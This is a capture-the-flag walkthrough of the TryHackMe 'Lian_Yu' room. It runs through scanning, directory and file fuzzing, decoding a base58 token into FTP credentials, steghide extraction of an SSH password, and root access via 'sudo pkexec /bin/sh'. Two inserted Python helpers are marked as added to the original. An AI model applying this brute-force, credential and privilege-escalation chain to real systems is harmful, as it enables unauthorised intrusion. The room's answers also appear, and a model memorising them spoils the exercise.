Disclaimer

The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the penetration approach described in this article for any illegal purpose. I take no responsibility for any consequences arising from that, nor for any misuse or damage caused.

Service discovery

┌──(rootkali)-[~/tryhackme/Lian_Yu]
└─# nmap -sV -Pn 10.10.174.43 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 05:22 EDT
Nmap scan report for 10.10.174.43
Host is up (0.30s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.2
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
80/tcp    open  http    Apache httpd
111/tcp   open  rpcbind 2-4 (RPC #100000)
59642/tcp open  status  1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3585.05 seconds

FTP login attempts

Trying to log in to FTP as anonymous and as Lian_Yu; both return Permission denied.

┌──(rootkali)-[~]
└─# ftp 10.10.174.43
Connected to 10.10.174.43.
220 (vsFTPd 3.0.2)
Name (10.10.174.43:root): anonymous
530 Permission denied.
Login failed.
ftp> bye
221 Goodbye.

┌──(rootkali)-[~]
└─# ftp 10.10.174.43
Connected to 10.10.174.43.
220 (vsFTPd 3.0.2)
Name (10.10.174.43:root): Lian_Yu
530 Permission denied.
Login failed.
ftp> bye
221 Goodbye.

We need a valid FTP username.

Directory brute-forcing

┌──(rootkali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.174.43

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.174.43/_21-11-04_05-23-21.txt

Error Log: /root/dirsearch/logs/errors-21-11-04_05-23-21.log

Target: http://10.10.174.43/

[05:23:21] Starting: 
[05:24:57] 301 -  236B  - /island  ->  http://10.10.174.43/island/
[05:33:51] 403 -  199B  - /server-status

Opening the /island page shows the following text:

<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p>
<!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p>
<h2 style="color:white"> vigilante</style></h2>

vigilante is the correct FTP username, but we do not know the password.

┌──(rootkali)-[~]
└─# ftp 10.10.174.43
Connected to 10.10.174.43.
220 (vsFTPd 3.0.2)
Name (10.10.174.43:root): vigilante
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.

hydra spent a long time brute-forcing vigilante's password with no result.
The hint says "In numbers"; the answer turns out to be the 2100 directory under /island/.

What is the Web Directory you found?

2100

The 2100 directory contains a single comment:

you can avail your .ticket here but how?

Continuing the directory brute-force

It looks like we need to brute-force a file with a .ticket extension, so we use wfuzz.

root@kali:~# wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.174.43/island/2100/FUZZ.ticket

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.174.43/island/2100/FUZZ.ticket
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000010444:   200        6 L      11 W     71 Ch       "green_arrow"

Opening /island/2100/green_arrow.ticket shows:

This is just a token to get into Queen's Gambit(Ship)

RTy8yhBQdscX

Base58-decoding RTy8yhBQdscX gives:

!#th3h00d
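As an added example, not from the original writeup: a pure-Python base58 decoder (standard Bitcoin alphabet) applied to the token above, with an encoder to confirm the round trip. The function names are mine.

```python
# Added example: decoding the .ticket token with base58 (Bitcoin alphabet).
# Pure Python, no third-party module; b58decode/b58encode are my own names.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}

# Token quoted in green_arrow.ticket on the page.
TOKEN = "RTy8yhBQdscX"


def is_base58(s: str) -> bool:
    """True if every character is in the alphabet (0, O, I and l are excluded)."""
    return bool(s) and all(c in INDEX for c in s)


def b58decode(s: str) -> bytes:
    """Decode a base58 string; each leading '1' stands for one leading zero byte."""
    if not is_base58(s):
        raise ValueError("not a base58 string: %r" % s)
    n = 0
    for c in s:
        n = n * 58 + INDEX[c]
    pad = len(s) - len(s.lstrip("1"))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here to confirm the decode round-trips."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = ALPHABET[r] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def decode_token(token: str = TOKEN) -> bytes:
    """Decode the page's token and check it round-trips before trusting it."""
    plain = b58decode(token)
    assert b58encode(plain) == token
    return plain


if __name__ == "__main__":
    print(decode_token().decode())  # prints !#th3h00d
```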

Log in to FTP as vigilante:!#th3h00d and download all of the files for local analysis.

┌──(rootkali)-[~/tryhackme/lianyu]
└─# ftp 10.10.174.43                                              130 ⨯
Connected to 10.10.174.43.
220 (vsFTPd 3.0.2)
Name (10.10.174.43:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .
drwxr-xr-x    4 0        0            4096 May 01  2020 ..
-rw-------    1 1001     1001           44 May 01  2020 .bash_history
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg

Analysis

Putting the photo aa.jpg into Google Image search identifies the person as Slade Wilson, which appears to be a superhero's name.

.other_user tells the story of Slade Wilson.

We guess that slade or wilson will be the SSH login name.

Leave_me_alone.png is a corrupted PNG image.
Queen's_Gambit.png is a normal PNG image.

We open Leave_me_alone.png in Sublime Text 2 and replace the first row
5845 6fae 0a0d
with
8950 4e47 0d0a
(the start of the PNG file signature) to repair the image; it then shows a password: password
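As an added example, not from the original writeup: a Python script that builds a tiny valid PNG in memory, damages its first six bytes the same way Leave_me_alone.png was damaged, and repairs it by rewriting the signature while checking that a well-formed IHDR chunk with a matching CRC follows, so a file damaged beyond the header is rejected rather than silently patched. The sample image and all function names are mine.

```python
# Added example: repairing a PNG whose signature bytes were overwritten, as with
# Leave_me_alone.png above. The sample PNG is constructed here; function names are mine.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"                    # 89 50 4e 47 0d 0a 1a 0a
DAMAGED_PREFIX = bytes.fromhex("58456fae0a0d")    # the six bytes seen on the page


def chunk(ctype: bytes, body: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, as the PNG spec requires."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_minimal_png(width: int = 1, height: int = 1) -> bytes:
    """Constructed sample: 8-bit RGB, all-black pixels, one filter byte per row."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = (b"\x00" + b"\x00\x00\x00" * width) * height
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def corrupt_signature(data: bytes) -> bytes:
    """Reproduce the damage from the page: first six bytes replaced, 1a 0a left intact."""
    return DAMAGED_PREFIX + data[6:]


def png_signature_ok(data: bytes) -> bool:
    return data[:8] == PNG_SIG


def repair_png_signature(data: bytes) -> bytes:
    """Rewrite the signature, then insist that a correct IHDR chunk follows.
    If IHDR is missing or its CRC fails, the damage is not confined to the
    header and the file is rejected instead of being silently 'repaired'."""
    if png_signature_ok(data):
        return data
    fixed = PNG_SIG + data[8:]
    length, ctype = struct.unpack(">I4s", fixed[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a valid IHDR")
    body = fixed[16:16 + length]
    (crc,) = struct.unpack(">I", fixed[16 + length:20 + length])
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
        raise ValueError("IHDR CRC mismatch")
    return fixed


def png_dimensions(data: bytes) -> tuple:
    """Width and height from IHDR; only meaningful once the signature check passes."""
    return struct.unpack(">II", data[16:24])
```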

Use this password to extract the hidden file from aa.jpg with steghide.

┌──(rootkali)-[~/tryhackme/lianyu]
└─# steghide extract -sf aa.jpg
Enter passphrase: 
wrote extracted data to "ss.zip".

Unzipping it gives two files, passwd.txt and shado:

┌──(rootkali)-[~/tryhackme/lianyu]
└─# cat passwd.txt 
This is your visa to Land on Lian_Yu # Just for Fun ***

a small Note about it

Having spent years on the island, Oliver learned how to be resourceful and set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.

┌──(rootkali)-[~/tryhackme/lianyu]
└─# cat shado     
**********

What is the file name with SSH password?

shado

Getting an initial shell

┌──(rootkali)-[~/tryhackme/lianyu]
└─# ssh slade@10.10.174.43
slade@10.10.174.43's password: 
                               Way To SSH...
                          Loading.........Done..
                    Connecting To Lian_Yu  Happy Hacking

██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗ 
██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝
██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝ 
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
 ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝

        ██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗
        ██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║
        ██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║
        ██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║
        ███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝
        ╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝  #

slade@LianYu:~$ whoami
slade
slade@LianYu:~$ id
uid=1000(slade) gid=1000(slade) groups=1000(slade),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)

user.txt is in the current directory.

Privilege escalation

Checking the current user's sudo rights shows that pkexec can be used directly to escalate privileges.

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

Escalating to root

slade@LianYu:~$ sudo /usr/bin/pkexec /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt